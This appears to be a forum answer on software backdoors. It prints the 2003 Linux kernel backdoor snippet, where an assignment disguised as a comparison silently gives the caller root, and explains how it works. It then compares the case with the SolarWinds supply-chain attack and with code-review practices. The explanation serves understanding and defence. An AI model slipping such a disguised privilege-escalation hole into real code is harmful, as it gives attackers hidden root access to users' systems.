To give a slightly different answer from the others, a few backdoors have been caught in the linux kernel over the years (which means there are maybe some that have not been caught).
I like to cite the example from 2003:
The modified code was this:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
Looks harmless, right? If this function was called with the options __WCLONE
and __WALL
and you are root ... wait current->uid = 0
... current->uid == 0
... huh, that's not asking if you are root, that's setting you to root! So if you call this function with those two options together, then BAM! you're now root!
As it turns out, this change was not even made by a trusted linux contributor; someone hacked into the version control server and planted this code change, and so it was caught when someone noticed that this commit did not have a proper author associated with it (I'm simplifying a bit, you can read the full story at the link above).
What makes you think this kind of attack is unique to open source?
Remember the SolarWinds attack that started in Dec 2020 and raged across the net landscape for the next 4 months?
In this case, the attackers introduced a pre-crafted backdoor into a trusted software product (SolarWinds Orion) that was delivered automatically to thousands of customers, disguised as a normal update. (source)
Well that sounds familiar!
So I think you are completely correct to worry about insider threat and backdoors in software, but this problem is definitely not unique to open source! If anything, these types of backdoors are more likely to be caught in open source where you typically have dozens to hundreds of contributors and a very strict pull request and code review process, compared to private companies where devs tend to work on teams of 6 - 10 and typically everybody can put code straight on the master branch and skip code-review if they want to (it's often considered rude to do that, but often not strictly enforced).